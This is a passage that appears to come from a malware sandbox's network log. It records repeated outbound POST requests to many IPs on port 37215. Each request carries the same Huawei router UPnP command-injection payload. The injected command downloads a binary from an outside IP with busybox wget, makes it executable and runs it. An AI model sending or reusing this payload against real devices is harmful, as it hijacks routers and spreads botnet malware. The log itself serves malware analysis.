                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1857192.168.2.154269445.206.111.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948122025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1858192.168.2.155022417.116.92.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948172092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1859192.168.2.1545620122.211.155.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948178053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1860192.168.2.154541031.50.148.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948204041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1861192.168.2.1547104107.160.219.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948227882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1862192.168.2.1540548122.128.140.17137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948247910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1863192.168.2.153844845.10.86.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948267937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1864192.168.2.1536144122.98.77.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948303938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1865192.168.2.1540886186.181.112.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948327065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1866192.168.2.1533124121.194.5.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948350906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
